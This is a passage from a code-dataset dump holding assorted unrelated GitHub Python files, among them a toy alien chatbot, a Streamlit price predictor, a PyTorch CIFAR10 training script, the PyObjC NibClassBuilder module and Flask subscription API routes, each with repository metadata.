there intelligent life on this planet? \",\n \"Does Earth have a leader? \",\n \"What planets have you visited? \",\n \"What technology do you have on this planet? \"\n )\n\n def __init__(self):\n self.alienbabble = { \n 'answer_why_intent': r'why\\sare.*',\n 'describe_planet_intent': r'tell\\sme\\sabout.*planet.*',\n 'cubed_intent': r'.*cube.*(\\d+).*'\n }\n\n def greet(self):\n self.name = input(\"Hello there! What is your name?\\n\")\n will_help = input(\"Hi {}, I'm ET. I'm not from this planet. Will you help me learn about your planet?\\n\".format(self.name))\n if will_help in self.negative_responses:\n return \"Ok, invading it is.\"\n self.chat()\n \n def make_exit(self, reply):\n for words in self.exit_commands:\n if words in reply:\n print(\"Ok. Invading it is.\")\n return -1\n\n def chat(self):\n reply = input(random.choice(self.random_questions)).lower()\n while not self.make_exit(reply):\n reply = input(self.match_reply(reply) + \"\\n\")\n \n\n def match_reply(self, reply):\n for key, value in self.alienbabble.items():\n intent = key\n regex_pattern = value\n found_match = re.match(regex_pattern, reply.lower())\n if found_match and \"describe_planet_intent\" in intent:\n return self.describe_planet_intent()\n elif found_match and \"answer_why_intent\" in intent:\n return self.answer_why_intent()\n elif found_match and \"cubed_intent\" in intent:\n return self.cubed_intent(found_match.group(1))\n else:\n return self.no_match_intent()\n\n def describe_planet_intent(self):\n responses = (\n \"My planet is a utopia of diverse orgamnisms and species. \",\n \"I am from Opidipus, the capital of the Wayward Galaxies. \")\n return random.choice(responses)\n \n\n def answer_why_intent(self):\n responses = (\n \"i come in piece\",\n \"I am here to collect data on your planet and its inhabitants\",\n \"I heard the coffee is good..\")\n return random.choice(responses)\n \n \n def cubed_intent(self, number):\n cubed_number = int(number)**3\n return \"The cube of {} is {}. Isn't that cool?\".format(number, cubed_number)\n\n\n def no_match_intent(self):\n responses = (\n \"Please tell me more.\",\n \"Tell me more!\",\n \"Why do you say that?\",\n \"I see. Can you elaborate?\",\n \"Interesting. Can you tell me more?\",\n \"I see. How do you think?\",\n \"Why?\",\n \"How do you think I feel when you say that?\")\n return random.choice(responses)\n\nET = AlienBot()\nET.greet()\n","repo_name":"And1B/Rule-Based-Chatbot","sub_path":"AlienBot.py","file_name":"AlienBot.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35147152042","text":"\"\"\"\nA quick example that calls the 3D wicket function to plot Moeen Ali's pitch map using the Hawkeye data from\nthe Men's ICC Cricket World Cup 2015 vs Australia on 14-02-2015\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom plots.pitch_densitymap import pitch_densitymap\n\n# Import Moeen Ali data\ndf = pd.read_csv('data/moeen.csv')\n\n# Hawkeye Data has Y co-ord as meters from stumps towards bowler, so need to flip pitchX and stumpsX for plotting\ndf['pitchX'] = -df['pitchX']\ndf['stumpsX'] = -df['stumpsX']\n\n# Filter to balls with tracking enabled\nballs = df[df['pitchY'] > 0]\n\n# Split balls for RHB and LHB and select pitch co-ords\nxy_rh = np.array(balls[balls.rightHandedBat == True][['pitchX', 'pitchY']])\n\ntitle = 'Moeen Ali'\nsubtitle_1 = 'Deliveries to Right-handers'\nsubtitle_2 = 'ICC Cricket World Cup 2015 | vs Australia | 14-02-2015'\n\npitch_densitymap(xy_rh, title=title, subtitle_1=subtitle_1, subtitle_2=subtitle_2)\n","repo_name":"opengoalapp/cricket_tracking","sub_path":"examples/moeen_example.py","file_name":"moeen_example.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41801367554","text":"from pathlib import Path\n\nimport yaml\n\n\nclass ProcessYaml:\n \"\"\"Process Yaml\"\"\"\n\n home = Path.home()\n\n def set_path(self, name_file) -> None:\n \"\"\"Get the content of file\"\"\"\n path = f\"{self.home}/Dropbox/kanban2/{name_file}\"\n if Path(path).is_file():\n self.yaml_file = path\n with open(self.yaml_file) as f:\n self.content_file = f.read()\n self.load_yaml()\n else:\n self.content_file = \"\"\n self.json_dir = {}\n\n def load_yaml(self):\n \"\"\"Load yaml file\"\"\"\n self.json_dir = yaml.safe_load(self.content_file)\n\n def __show_home(self):\n \"\"\"Mostrar el path del yaml_file\"\"\"\n print(self.yaml_file)\n\n def show_stages(self):\n \"\"\"Show board's stages\"\"\"\n for stage in self.json_dir[\"stages\"]:\n print(stage)\n\n def stages(self):\n \"\"\"Get the board's stages (columns)\"\"\"\n return self.json_dir[\"stages\"]\n\n\nif __name__ == \"__main__\":\n process = ProcessYaml()\n process.set_path(\"todo.yml\")\n process.show_stages()\n","repo_name":"justafewwords4/kultimate","sub_path":"kultimate/utils/process_yaml.py","file_name":"process_yaml.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40648043417","text":"import os\n\n_basedir = os.path.abspath(os.path.dirname(__file__))\n\n# LOGGING_FORMAT = \"%(asctime)-15s %(clientip)s %(user)-8s %(message)s\"\n# logging.basicConfig(format=FORMAT)\nDEBUG = True\nSECRET_KEY = \"development_key\"\nCACHE_TIMEOUT = 60 * 60 * 15 # Default is 15 minutes\n\n#-- Redis settings\n# REDIS_CLASS = 'redis.Redis' if IS_24 else 'redis.StrictRedis'\nREDIS_HOST = \"localhost\"\nREDIS_PORT = 6379\nREDIS_DB = 0\n\nREDIS_BACKUP_HOST = \"localhost\"\nREDIS_BACKUP_PORT = 6380\nREDIS_BACKUP_DB = 0\n\nREDIS_SLAVE_HOST = \"localhost\"\nREDIS_SLAVE_PORT = 6381\nREDIS_SLAVE_DB = 0\n\n#-- Redis Key Tokens\nREDIS_KEY_TOKEN_SPORT = \"{{sport}}\"\n\n#-- Redis Keys\nREDIS_KEY_TEAMS = REDIS_KEY_TOKEN_SPORT + \"_teams\"\n\n# DICT_KEY_DATA = \"data\"\n# DICT_KEY_META = \"meta\"\n\n# LIST_NAME = 'flask'\n# RSYNC_PATH = 'librelist.com::json/%s'\n# SUBJECT_PREFIX = '[flask]'\n# WHOOSH_INDEX = os.path.join(_basedir, 'flask-website.whoosh')\n# DOCUMENTATION_PATH = os.path.join(_basedir, '../flask/docs/_build/dirhtml')\n\ndel os\n","repo_name":"jkereako/stats-html-scraper-api","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44263702009","text":"import streamlit as st \nimport pandas as pd \nimport numpy as np \nimport joblib \n\ndef run_ml_app():\n\n st.subheader('현재 자산과 상태를 통해')\n st.subheader('적정한 차량금액을 알 수 있습니다.')\n \n st.subheader('Machine Learnig 예측')\n\n # 1. 유저한테, 데이터를 입력 받습니다.\n gender=st.radio('성별을 입력하세요.',['남자','여자'])\n if gender == '남자':\n gender_number = 1\n elif gender =='여자':\n gender_number = 0\n\n age=st.number_input('나이 입력',min_value=1,max_value=100)\n salary=st.number_input('연봉을 입력해주세요',min_value=10000)\n debt=st.number_input('카드 빛 입력',min_value=0)\n worth =st.number_input('자산 입력',min_value=10000)\n\n # print(gender_number,age,salary,debt,worth)\n # 2. 모델에 예측한다.\n # 2-1 신규 데이터를 넘파이로 만든다.\n new_data=np.array([gender_number,age,salary,debt,worth])\n new_data= new_data.reshape(1,5)\n #2-2 스케일러와 인공지능을 변수로 불러온다.\n scaler_X=joblib.load('data/scaler_X.pkl')\n scaler_y=joblib.load('data/scaler_y.pkl')\n regressor=joblib.load('data/regressor.pkl ')\n # 2-3. 신규 데이터를 피쳐 스케일링 한다 .\n new_data=scaler_X.transform(new_data)\n # 2-4. 인공 지능에게 예측을 하게 한다.\n y_pred=regressor.predict(new_data)\n\n #2-5. 예측한 결과는, 다시 원래대로 복구해 줘야한다.\n # print(y_pred)\n\n y_pred=scaler_y.inverse_transform(y_pred.reshape(1,1))\n\n # print(y_pred)\n # 3. 예측 결과를 웹 대시보드에 표시한다.\n btn=st.button('예측 결과 확인')\n # 결과가 소수점으로 나오는데 , 소수점 뒤 한자리 까지만\n # 나오도록 코드 수정하기.\n\n\n if btn:\n st.subheader('예측 결과!' + ' '+' {0:.1f} 달러의 차를 살수 있습니다,'.format(y_pred[0,0]))\n ","repo_name":"haneul0147/dashboard_car","sub_path":"ml_app.py","file_name":"ml_app.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14478017876","text":"import json\nimport factories\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\n\n@pytest.mark.django_db\ndef test_bot_verify(auth_client, user):\n factories.TuserFactory.create(\n tg_chat_id=123445,\n tg_user_id=124315315,\n tg_username='testuser',\n user=user,\n verification_code='correct'\n )\n url = reverse('bot_verify')\n payload1 = {\n 'verification_code': 'correct'\n }\n payload2 = {\n 'verification_code': 'incorrect'\n }\n\n response1 = auth_client.patch(\n path=url,\n data=json.dumps(payload1),\n content_type='application/json',\n )\n response2 = auth_client.patch(\n path=url,\n data=json.dumps(payload2),\n content_type='application/json',\n )\n\n assert response1.status_code == status.HTTP_201_CREATED\n assert response2.status_code == status.HTTP_400_BAD_REQUEST\n\n","repo_name":"alllvp/diploma","sub_path":"todolist/tests/test_bot/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5424623900","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport numpy\nimport os\nimport sys\nimport time\n\nif '../public' not in sys.path:\n sys.path.append('../public')\nfrom widget import history_c\nfrom xfilter import xfilter\n\nimport matplotlib.pyplot as plt\n\ndef main():\n history = history_c()\n history.load('../../daily/163/data/dbf/2012.dbf')\n plt.axhline(y=0.0, color='k', alpha=0.2)\n jstr = raw_input().strip()\n task = json.loads(jstr)\n n = len(task['code'])\n for i in xrange(n):\n row = history.kweek(task['code'][i], task['tweek'][i])\n co = 'r'\n if row[0]<1e-6:\n co = 'g'\n li = '-'\n if row[3]<5:\n li = '--'\n plt.plot([i, i], [row[1], row[2]], co+li)\n plt.plot([i], [row[1]], co+',')\n plt.plot([i], [row[2]], co+',')\n plt.plot([i], [row[0]], co+'o')\n #plt.plot([-1, n], [0, 0], '.', alpha=1.0)\n plt.xlim(-1, n)\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"jki14/the-cat-of-wall-street","sub_path":"legacy/weekly/svm-r/kweek.py","file_name":"kweek.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15996388372","text":"import torch.optim\nimport torchvision\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom learning.learn_pytorch.model import *\n\ntrain_data = torchvision.datasets.CIFAR10(\"./dataset\", train=True, transform=torchvision.transforms.ToTensor(),\n download=True)\ntest_data = torchvision.datasets.CIFAR10(\"./dataset\", train=False, transform=torchvision.transforms.ToTensor(),\n download=True)\n\ntrain_data_size = len(train_data)\ntest_data_size = len(test_data)\n\ntrain_dataloader = DataLoader(train_data, batch_size=64)\ntest_dataloader = DataLoader(test_data, batch_size=64)\n\ndm = DM()\n\nloss_fn = nn.CrossEntropyLoss()\n\nlearn_rate = 1e-2\noptimizer = torch.optim.SGD(dm.parameters(), lr=learn_rate)\n\ntotal_train_step = 0\ntotal_test_step = 0\nepoch = 10\n\nwriter = SummaryWriter(\"../logs_train\")\n\nfor i in range(epoch):\n print(\"第{}轮训练开始\".format(i + 1))\n\n for data in train_dataloader:\n imgs, targets = data\n outputs = dm(imgs)\n loss = loss_fn(outputs, targets)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_train_step += 1\n if total_train_step % 100 == 0:\n print(\"训练次数:{},loss:{}\".format(total_train_step, loss.item()))\n writer.add_scalar(\"train_loss\", loss.item(), total_train_step)\n\n total_test_loss = 0\n total_accruracy = 0\n with torch.no_grad():\n for data in test_dataloader:\n imgs, targets = data\n outputs = dm(imgs)\n loss = loss_fn(outputs, targets)\n total_test_loss += loss.item()\n accuracy = (outputs.argmax(1) == targets).sum()\n total_accruracy += accuracy\n print(\"整体测试集上的loss:{}\".format(total_test_loss))\n print(\"整体测试集上的正确率:{}\".format(total_accruracy/test_data_size))\n writer.add_scalar(\"test_loss\", total_test_loss, total_test_step)\n writer.add_scalar(\"test_accuracy\", total_accruracy/test_data_size, total_test_step)\n total_test_step += 1\n\n torch.save(dm, \"dm_{}.pth\".format(i))\n print(\"模型已保存\")\n\nwriter.close()\n","repo_name":"Chancerain/learning","sub_path":"learn_pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7627015584","text":"#!/usr/bin/env python\n\n\"\"\"NibClassBuilder.py -- Tools for working with class definitions in\n\"Next Interface Builder\" files (\"nibs\").\n\nNOTE: This module is deprecated and is not supported with modern versions\nof Interface Builder because those uses a NIB format that is not compatibility\nwith NibClassBuilder. We have no intention whatsoever to fix the compatibility\nissues, use explicit definitions instead. On a more possitive note: IB 3.0\nfully supports reading class definitions from Python files, which removes\nthe reason why we wrote this module in the first place.\n\n\n\n\nExtracting class definitions from nibs.\n\nThe module maintains a global set of class definitions, extracted from\nnibs. To add the classes from a nib to this set, use the extractClasses()\nfunction. It can be called in two ways:\n\n extractClasses(nibName, bundle=<main-bundle>)\n This finds the nib by name from a bundle. If no bundle\n if given, the main bundle is searched.\n\n extractClasses(path=pathToNib)\n This uses an explicit path to a nib.\n\nextractClasses() can be called multiple times for the same bundle: the\nresults are cached so no almost extra overhead is caused.\n\n\nUsing the class definitions.\n\nThe module contains a \"magic\" base (super) class called AutoBaseClass.\nSubclassing AutoBaseClass will invoke some magic that will look up the\nproper base class in the class definitions extracted from the nib(s).\nIf you use multiple inheritance to use Cocoa's \"informal protocols\",\nyou _must_ list AutoBaseClass as the first base class. For example:\n\n class PyModel(AutoBaseClass, NSTableSource):\n ...\n\n\nThe NibInfo class.\n\nThe parsing of nibs and collecting the class definition is done by the\nNibInfo class. You normally don't use it directly, but it's here if you\nhave special needs.\n\n\nThe command line tool.\n\nWhen run from the command line, this module invokes a simple command\nline program, which you feed paths to nibs. This will print a Python\ntemplate for all classes defined in the nib(s). For more documentation, see\nthe commandline_doc variable, or simply run the program without\narguments. It also contains a simple test program.\n\"\"\"\n\n#\n# Written by Just van Rossum <just@letterror.com>, borrowing heavily\n# from Ronald Oussoren's classnib.py module, which this module\n# supercedes. Lots of additional input from Bill Bumgarner and Jack\n# Jansen.\n#\n\nimport sys\nimport os\nimport objc\n\nimport warnings\nwarnings.warn(\"PyObjCTools.NibClassBuilder is deprecated, use explicit definitions instead\", DeprecationWarning)\n\n\n__all__ = [\"AutoBaseClass\", \"NibInfo\", \"extractClasses\"]\n\n\nfrom Foundation import NSDictionary, NSObject, NSBundle\nimport AppKit # not used directly, but we look up classes from AppKit\n # dynamically, so it has to be loaded.\n\n\nclass NibLoaderError(Exception): pass\n\n\nclass ClassInfo:\n\n attrNames = (\"nibs\", \"name\", \"super\", \"actions\", \"outlets\")\n\n def __repr__(self):\n items = self.__dict__.items()\n items.sort()\n return self.__class__.__name__ + \"(\" + \\\n \", \".join([ \"%s=%s\"%i for i in items ]) + \")\"\n\n def merge(self, other):\n assert self.name == other.name\n if self.super != other.super:\n raise NibLoaderError(\n \"Incompatible superclass for %s\" % self.name)\n self.nibs = mergeLists(self.nibs, other.nibs)\n self.outlets = mergeLists(self.outlets, other.outlets)\n self.actions = mergeLists(self.actions, other.actions)\n\n def __cmp__(self, other):\n s = [getattr(self, x) for x in self.attrNames]\n o = [getattr(other, x) for x in self.attrNames]\n return cmp(s, o)\n\n\nclass NibInfo(object):\n\n def __init__(self):\n self.classes = {}\n self.parsedNibs = {}\n\n # we implement a subset of the dictionary protocol, for convenience.\n\n def keys(self):\n return self.classes.keys()\n\n def has_key(self, name):\n return self.classes.has_key(name)\n\n def len(self):\n return len(self.classes)\n\n def __iter__(self):\n return iter(self.classes)\n\n def __getitem__(self, name):\n return self.classes[name]\n\n def get(self, name, default=None):\n return self.classes.get(name, default)\n\n def extractClasses(self, nibName=None, bundle=None, path=None):\n \"\"\"Extract the class definitions from a nib.\n\n The nib can be specified by name, in which case it will be\n searched in the main bundle (or in the bundle specified), or\n by path.\n \"\"\"\n if path is None:\n self._extractClassesFromNibFromBundle(nibName, bundle)\n else:\n if nibName is not None or bundle is not None:\n raise ValueError(\"Can't specify 'nibName' or \"\n \"'bundle' when specifying 'path'\")\n self._extractClassesFromNibFromPath(path)\n\n def _extractClassesFromNibFromBundle(self, nibName, bundle=None):\n if not bundle:\n bundle = objc.currentBundle()\n if nibName[-4:] == '.nib':\n resType = None\n else:\n resType = \"nib\"\n path = bundle.pathForResource_ofType_(nibName, resType)\n if not path:\n raise NibLoaderError(\"Could not find nib named '%s' \"\n \"in bundle '%s'\" % (nibName, bundle))\n self._extractClassesFromNibFromPath(path)\n\n def _extractClassesFromNibFromPath(self, path):\n path = os.path.normpath(path)\n if self.parsedNibs.has_key(path):\n return # we've already parsed this nib\n nibName = os.path.basename(path)\n nibInfo = NSDictionary.dictionaryWithContentsOfFile_(\n os.path.join(path, 'classes.nib'))\n if nibInfo is None:\n raise NibLoaderError(\"Invalid NIB file [%s]\" % path)\n if not nibInfo.has_key('IBVersion'):\n raise NibLoaderError(\"Invalid NIB info\")\n if nibInfo['IBVersion'] != '1':\n raise NibLoaderError(\"Unsupported NIB version\")\n for rawClsInfo in nibInfo['IBClasses']:\n self._addClass(nibName, rawClsInfo)\n self.parsedNibs[path] = 1\n\n def _addClass(self, nibName, rawClsInfo):\n classes = self.classes\n name = rawClsInfo['CLASS']\n if name == \"FirstResponder\":\n # a FirstResponder never needs to be made\n return\n\n clsInfo = ClassInfo()\n clsInfo.nibs = [nibName] # a class can occur in multiple nibs\n clsInfo.name = name\n clsInfo.super = rawClsInfo.get('SUPERCLASS', 'NSObject')\n clsInfo.actions = [a + \"_\" for a in rawClsInfo.get('ACTIONS', ())]\n clsInfo.outlets = list(rawClsInfo.get('OUTLETS', ()))\n\n if not classes.has_key(name):\n classes[name] = clsInfo\n else:\n classes[name].merge(clsInfo)\n\n def makeClass(self, name, bases, methods):\n \"\"\"Construct a new class using the proper base class, as specified\n in the nib.\n \"\"\"\n clsInfo = self.classes.get(name)\n if clsInfo is None:\n raise NibLoaderError(\"No class named '%s' found in \"\n \"nibs\" % name)\n\n try:\n superClass = objc.lookUpClass(clsInfo.super)\n except objc.nosuchclass_error:\n raise NibLoaderError((\"Superclass '%s' for '%s' not \"\n \"found.\" % (clsInfo.super, name)))\n bases = (superClass,) + bases\n metaClass = superClass.__class__\n\n for o in clsInfo.outlets:\n if not methods.has_key(o):\n methods[o] = objc.IBOutlet(o)\n\n for a in clsInfo.actions:\n if not methods.has_key(a):\n # XXX we could issue warning here!\n pass\n # don't insert a stub as it effectively disables\n # AppKit's own method validation\n #methods[a] = _actionStub\n\n return metaClass(name, bases, methods)\n\n def printTemplate(self, file=None):\n \"\"\"Print a Python template of classes, matching their specification\n in the nib(s).\n \"\"\"\n if file is None:\n file = sys.stdout\n writer = IndentWriter(file)\n self._printTemplateHeader(writer)\n\n classes = self.classes.values()\n classes.sort() # see ClassInfo.__cmp__\n for clsInfo in classes:\n if _classExists(clsInfo.super):\n self._printClass(writer, clsInfo)\n else:\n writer.writeln(\"if 0:\")\n writer.indent()\n writer.writeln(\"# *** base class not found: %s\" % clsInfo.super)\n self._printClass(writer, clsInfo)\n writer.dedent()\n\n self._printTemplateFooter(writer)\n\n def _printTemplateHeader(self, writer):\n nibs = {}\n for clsInfo in self.classes.values():\n for nib in clsInfo.nibs:\n nibs[nib] = 1\n\n writer.writeln(\"import objc\")\n writer.writeln(\"from Foundation import *\")\n writer.writeln(\"from AppKit import *\")\n writer.writeln(\"from PyObjCTools import NibClassBuilder, AppHelper\")\n writer.writeln()\n writer.writeln()\n nibs = nibs.keys()\n nibs.sort()\n for nib in nibs:\n assert nib[-4:] == \".nib\"\n nib = nib[:-4]\n writer.writeln(\"NibClassBuilder.extractClasses(\\\"%s\\\")\" % nib)\n writer.writeln()\n writer.writeln()\n\n def _printTemplateFooter(self, writer):\n writer.writeln()\n writer.writeln('if __name__ == \"__main__\":')\n writer.indent()\n writer.writeln('AppHelper.runEventLoop()')\n writer.dedent()\n\n def _printClass(self, writer, clsInfo):\n nibs = clsInfo.nibs\n if len(nibs) > 1:\n nibs[-2] = nibs[-2] + \" and \" + nibs[-1]\n del nibs[-1]\n nibs = \", \".join(nibs)\n writer.writeln(\"# class defined in %s\" % nibs)\n writer.writeln(\"class %s(NibClassBuilder.AutoBaseClass):\" % clsInfo.name)\n writer.indent()\n writer.writeln(\"# the actual base class is %s\" % clsInfo.super)\n outlets = clsInfo.outlets\n actions = clsInfo.actions\n if outlets:\n writer.writeln(\"# The following outlets are added to the class:\")\n outlets.sort()\n for o in outlets:\n writer.writeln(\"# %s\" % o)\n writer.writeln()\n if not actions:\n writer.writeln(\"pass\")\n writer.writeln()\n else:\n if actions:\n actions.sort()\n for a in actions:\n writer.writeln(\"def %s(self, sender):\" % a)\n writer.indent()\n writer.writeln(\"pass\")\n writer.dedent()\n writer.writeln()\n writer.writeln()\n writer.dedent()\n\n\ndef _frameworkForClass(className):\n \"\"\"Return the name of the framework containing the class.\"\"\"\n try:\n cls = objc.lookUpClass(className)\n except objc.error:\n return \"\"\n path = NSBundle.bundleForClass_(cls).bundlePath()\n if path == \"/System/Library/Frameworks/Foundation.framework\":\n return \"Foundation\"\n elif path == \"/System/Library/Frameworks/AppKit.framework\":\n return \"AppKit\"\n else:\n return \"\"\n\n\ndef _classExists(className):\n \"\"\"Return True if a class exists in the Obj-C runtime.\"\"\"\n try:\n objc.lookUpClass(className)\n except objc.error:\n return 0\n else:\n return 1\n\n\nclass IndentWriter:\n\n \"\"\"Simple helper class for generating (Python) code.\"\"\"\n\n def __init__(self, file=None, indentString=\" \"):\n if file is None:\n file = sys.stdout\n self.file = file\n self.indentString = indentString\n self.indentLevel = 0\n\n def writeln(self, line=\"\"):\n if line:\n self.file.write(self.indentLevel * self.indentString +\n line + \"\\n\")\n else:\n self.file.write(\"\\n\")\n\n def indent(self):\n self.indentLevel += 1\n\n def dedent(self):\n assert self.indentLevel > 0, \"negative dedent\"\n self.indentLevel -= 1\n\n\ndef mergeLists(l1, l2):\n r = {}\n for i in l1:\n r[i] = 1\n for i in l2:\n r[i] = 1\n return r.keys()\n\n\nclass _NibClassBuilder(type):\n\n def _newSubclass(cls, name, bases, methods):\n # Constructor for AutoBaseClass: create an actual\n # instance of _NibClassBuilder that can be subclassed\n # to invoke the magic behavior.\n return type.__new__(cls, name, bases, methods)\n _newSubclass = classmethod(_newSubclass)\n\n def __new__(cls, name, bases, methods):\n # __new__ would normally create a subclass of cls, but\n # instead we create a completely different class.\n if bases and bases[0].__class__ is cls:\n # get rid of the AutoBaseClass base class\n bases = bases[1:]\n return _nibInfo.makeClass(name, bases, methods)\n\n\n# AutoBaseClass is a class that has _NibClassBuilder is its' metaclass.\n# This means that if you subclass from AutoBaseClass, _NibClassBuilder\n# will be used to create the new \"subclass\". This will however _not_\n# be a real subclass of AutoBaseClass, but rather a subclass of the\n# Cocoa class specified in the nib.\nAutoBaseClass = _NibClassBuilder._newSubclass(\"AutoBaseClass\", (), {})\n\n\n_nibInfo = NibInfo()\n\nextractClasses = _nibInfo.extractClasses\n\n\n#\n# The rest of this file is a simple command line tool.\n#\n\ncommandline_doc = \"\"\"\\\nNibLoader.py [-th] nib1 [...nibN]\n Print an overview of the classes found in the nib file(s) specified,\n listing their superclass, actions and outlets as Python source. This\n output can be used as a template or a stub.\n -t Instead of printing the overview, perform a simple test on the\n arguments.\n -h Print this text.\"\"\"\n\ndef usage(msg, code):\n if msg:\n print(msg)\n print(commandline_doc)\n sys.exit(code)\n\ndef test(*nibFiles):\n for path in nibFiles:\n print(\"Loading %s\"%(path,))\n extractClasses(path=path)\n print\n classNames = _nibInfo.keys()\n classNames.sort()\n for className in classNames:\n try:\n # instantiate class, equivalent to\n # class <className>(AutoBaseClass):\n # pass\n cls = type(className.encode('ascii'), (AutoBaseClass,), {})\n except NibLoaderError as why:\n print(\"*** Failed class: %s; NibLoaderError: %s\" % (\n className, why[0]))\n else:\n print(\"Created class: %s, superclass: %s\" % (cls.__name__,\n cls.__bases__[0].__name__))\n\ndef printTemplate(*nibFiles):\n for path in nibFiles:\n extractClasses(path=path)\n _nibInfo.printTemplate()\n\ndef commandline():\n import getopt\n\n try:\n opts, nibFiles = getopt.getopt(sys.argv[1:], \"th\")\n except getopt.error as msg:\n usage(msg, 1)\n\n doTest = 0\n for opt, val in opts:\n if opt == \"-t\":\n doTest = 1\n elif opt == \"-h\":\n usage(\"\", 0)\n\n if not nibFiles:\n usage(\"No nib file specified.\", 1)\n\n if doTest:\n test(*nibFiles)\n else:\n printTemplate(*nibFiles)\n\n\nif __name__ == \"__main__\":\n commandline()\n","repo_name":"albertz/music-player","sub_path":"mac/pyobjc-framework-Cocoa/Lib/PyObjCTools/NibClassBuilder.py","file_name":"NibClassBuilder.py","file_ext":"py","file_size_in_byte":15217,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"81"} +{"seq_id":"4377915229","text":"def partition(arr,l,r):\r\n pivot=arr[l]\r\n i=l+1\r\n j =r\r\n while True:\r\n while i<=r and arr[i]<=pivot:\r\n i+=1\r\n while l<=j and arr[j]>pivot:\r\n j-=1\r\n if j>=i:\r\n arr[i],arr[j]=arr[j],arr[i]\r\n else:\r\n break\r\n arr[l],arr[j]=arr[j],arr[l]\r\n return j\r\n\r\ndef quicksort(arr,l,r):\r\n if l<r:\r\n pivot=partition(arr,l,r)\r\n quicksort(arr,l,pivot-1)\r\n quicksort(arr,pivot+1,r)\r\n\r\nn=list(map(int,input().split()))\r\nquicksort(n,0,len(n)-1)\r\nprint(n)","repo_name":"ssong915/hongik_3_1","sub_path":"PL/과제1/PL_B935277_hw1/hw1_2.py","file_name":"hw1_2.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30448860089","text":"from flask import jsonify, request, current_app\nfrom marshmallow import ValidationError\n\nfrom app import db\nfrom app.api import bp\nfrom app.api.errors import error_response, bad_request\nfrom app.api.schemas import new_sub_schema, edit_sub_schema\nfrom app.gios_api import GiosService\nfrom app.models import Subscription\n\n\n@bp.route('/', methods=['GET'])\ndef connection():\n return jsonify({'message': 'API is online!'}), 200\n\n\n@bp.route('/air-data', methods=['GET'])\ndef get_air_data(): # TODO: functional testy\n lat = request.args.get('lat', None)\n lon = request.args.get('lon', None)\n if not lat or not lon:\n return error_response(422, 'Lack required parameters (lat, lon).')\n else:\n return jsonify(GiosService.get_nearest_station_data(lat, lon)), 200\n\n\n@bp.route('/register', methods=['POST'])\ndef register():\n \"\"\"\n {\n \"email\": \"sample@test.pl\",\n \"lat\": 51.1234,\n \"lon\": 21.0101,\n \"hours\": [12, 14, 20]\n }\n \"\"\"\n json_data = request.get_json()\n if not json_data:\n return bad_request('No input data provided')\n try:\n data = new_sub_schema.load(json_data)\n except ValidationError as e:\n return jsonify(e.messages), 422\n else:\n current_app.logger.info('Subscription data: %s' % data)\n\n # sprawdzić czy email już istnieje\n old_sub = Subscription.query.filter_by(email=data.get('email')).first()\n if old_sub is not None:\n current_app.logger.info(\"Email taken\")\n return error_response(422, \"Email '%s' already registered!\" % data.get('email'))\n\n hours = data.pop('hours')\n sub = Subscription(**data)\n sub.update_hours(hours)\n\n db.session.add(sub)\n db.session.commit()\n current_app.logger.info(\"Subscription saved\")\n return jsonify({'message': 'Subscription saved!'}), 200\n\n\n@bp.route('/subscription/<token>', methods=['GET', 'PUT', 'DELETE'])\ndef manage_subscription(token):\n subscription = Subscription.verify_change_subscription_token(token)\n if not subscription:\n return error_response(404, \"Token not recognized\")\n else:\n current_app.logger.info('Manage: %s' % subscription)\n\n # usunięcie subskrypcji\n if request.method == 'DELETE':\n db.session.delete(subscription)\n db.session.commit()\n current_app.logger.info('Subscription deleted')\n return jsonify({'message': 'Subscription deleted'}), 200\n\n # aktualizacja subskrypcji\n elif request.method == \"PUT\":\n json_data = request.get_json()\n if not json_data:\n return bad_request('No input data provided')\n try:\n data = edit_sub_schema.load(json_data)\n except ValidationError as e:\n return jsonify(e.messages), 422\n else:\n current_app.logger.info('Update subscription data: %s' % data)\n subscription.update_hours(data.pop('hours'))\n for key, value in data.items():\n subscription.__setattr__(key, value)\n\n db.session.add(subscription)\n db.session.commit()\n current_app.logger.info('Subscription updated')\n\n return jsonify({'message': 'Subscription updated'}), 200\n\n # pobierz dane subskrypcji\n elif request.method == \"GET\":\n result = new_sub_schema.dump(subscription)\n return result, 200\n\n\n@current_app.after_request\ndef after_request(response):\n current_app.logger.info('%s %s %s %s %s', request.remote_addr, request.method, request.scheme, request.full_path,\n response.status)\n return response\n","repo_name":"pgarr/smog-backend","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15256485125","text":"#!/usr/bin/python\n\nfrom gi.repository import Gtk, Gdk, GObject, Pango\nfrom gi.repository import UbiquityWebcam, GdkPixbuf\nfrom ubiquity import misc\nimport cairo, os\n\ndef draw_round_rect(c, r, x, y, w, h):\n 